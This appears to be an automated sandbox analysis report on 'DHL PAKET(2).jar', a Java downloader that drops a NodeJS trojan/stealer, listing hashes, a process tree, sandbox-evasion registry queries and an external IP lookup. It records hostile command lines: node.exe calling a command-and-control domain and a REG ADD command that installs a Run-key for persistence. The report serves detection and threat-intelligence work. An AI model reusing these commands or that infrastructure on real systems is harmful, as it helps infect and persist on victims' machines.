DHL PAKET(2).jar

General

Target: DHL PAKET(2).jar
Filesize: 103KB
Completed: 11-11-2020 07:33
Score: 10/10
MD5: e299449157cf031f03fbfe79d7900d52
SHA1: d57ca0f5a6770b760f40e2be3948869ff14caa08
SHA256: fcca91752e1952ea82e9528213dcd6e063277b0df1becad05cd5071509ef6074

Malware Config
Signatures 8

  • QNodeService

    Description

    Trojan/stealer written in NodeJS and spread via Java downloader.

  • Executes dropped EXE
    node.exe, node.exe, node.exe

    Reported IOCs

    pid  | process
    428  | node.exe
    1252 | node.exe
    936  | node.exe
  • Adds Run key to start application
    reg.exe

    TTPs

    Registry Run Keys / Startup Folder; Modify Registry

    Reported IOCs

    description     | ioc | process
    Key created     | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\696a743c-ce03-4077-b718-d89c437a07b2 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe
  • JavaScript code in executable

    Reported IOCs

    resource                                     | yara_rule
    behavioral2/files/0x000100000001ab93-172.dat | js
    behavioral2/files/0x000100000001ab93-176.dat | js
    behavioral2/files/0x000100000001ab93-180.dat | js
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flow | ioc
    22   | wtfismyip.com
    23   | wtfismyip.com
  • Checks processor information in registry
    node.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry; System Information Discovery

    Reported IOCs

    description       | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
    Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe
    Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
  • Suspicious behavior: EnumeratesProcesses
    node.exe, node.exe, node.exe

    Reported IOCs

    pid  | process
    428  | node.exe
    428  | node.exe
    428  | node.exe
    428  | node.exe
    1252 | node.exe
    1252 | node.exe
    1252 | node.exe
    1252 | node.exe
    936  | node.exe
    936  | node.exe
    936  | node.exe
    936  | node.exe
    936  | node.exe
    936  | node.exe
    936  | node.exe
    936  | node.exe
    936  | node.exe
    936  | node.exe
  • Suspicious use of WriteProcessMemory
    java.exe, javaw.exe, node.exe, node.exe, node.exe, cmd.exe

    Reported IOCs

    description                      | pid  | process   | target process
    PID 828 wrote to memory of 1192  | 828  | java.exe  | javaw.exe
    PID 828 wrote to memory of 1192  | 828  | java.exe  | javaw.exe
    PID 1192 wrote to memory of 428  | 1192 | javaw.exe | node.exe
    PID 1192 wrote to memory of 428  | 1192 | javaw.exe | node.exe
    PID 428 wrote to memory of 1252  | 428  | node.exe  | node.exe
    PID 428 wrote to memory of 1252  | 428  | node.exe  | node.exe
    PID 1252 wrote to memory of 936  | 1252 | node.exe  | node.exe
    PID 1252 wrote to memory of 936  | 1252 | node.exe  | node.exe
    PID 936 wrote to memory of 2308  | 936  | node.exe  | cmd.exe
    PID 936 wrote to memory of 2308  | 936  | node.exe  | cmd.exe
    PID 2308 wrote to memory of 2248 | 2308 | cmd.exe   | reg.exe
    PID 2308 wrote to memory of 2248 | 2308 | cmd.exe   | reg.exe
Processes 7
  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\DHL PAKET(2).jar"
    Suspicious use of WriteProcessMemory
    PID:828
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\0435658a.tmp
      Suspicious use of WriteProcessMemory
      PID:1192
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain spaco110cddfdf.ddns.net
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        PID:428
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_8lHHyj\boot.js --hub-domain spaco110cddfdf.ddns.net
          Executes dropped EXE
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:1252
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_8lHHyj\boot.js --hub-domain spaco110cddfdf.ddns.net
            Executes dropped EXE
            Checks processor information in registry
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of WriteProcessMemory
            PID:936
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "696a743c-ce03-4077-b718-d89c437a07b2" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              Suspicious use of WriteProcessMemory
              PID:2308
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "696a743c-ce03-4077-b718-d89c437a07b2" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                Adds Run key to start application
                PID:2248
Network
MITRE ATT&CK Matrix
Downloads
  • C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
    MD5: d41d8cd98f00b204e9800998ecf8427e
    SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Users\Admin\AppData\Local\Temp\0435658a.tmp
    MD5: e299449157cf031f03fbfe79d7900d52
    SHA1: d57ca0f5a6770b760f40e2be3948869ff14caa08
    SHA256: fcca91752e1952ea82e9528213dcd6e063277b0df1becad05cd5071509ef6074
    SHA512: e4f61b06a8b6f605478b612851ead655f984866919973a6740e417e055c20c309a81786eb3d8c99816a49abe07c009e2efa8bfd672c5e7516dfc8a8fbe23a6ba

  • C:\Users\Admin\AppData\Local\Temp\_qhub_node_8lHHyj\boot.js
    MD5: 3859487feb5152e9d1afc4f8cd320608
    SHA1: 7bf154c9ddf3a71abf15906cdb60773e8ae07b62
    SHA256: 8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13
    SHA512: 826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8

  • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
    MD5: f0b11a5823c45fc2664e116dc0323bcb
    SHA1: 612339040c1f927ec62186cd5012f4bb9c53c1b9
    SHA256: 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
    SHA512: 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

  • memory/428-174-0x000003088CF00000-0x000003088CF01000-memory.dmp
  • memory/428-171-0x0000000000000000-mapping.dmp
  • memory/936-179-0x0000000000000000-mapping.dmp
  • memory/936-181-0x0000002BAFFC0000-0x0000002BAFFC1000-memory.dmp
  • memory/1192-57-0x0000000000000000-mapping.dmp
  • memory/1252-177-0x0000016F37DC0000-0x0000016F37DC1000-memory.dmp
  • memory/1252-175-0x0000000000000000-mapping.dmp
  • memory/2248-183-0x0000000000000000-mapping.dmp
  • memory/2308-182-0x0000000000000000-mapping.dmp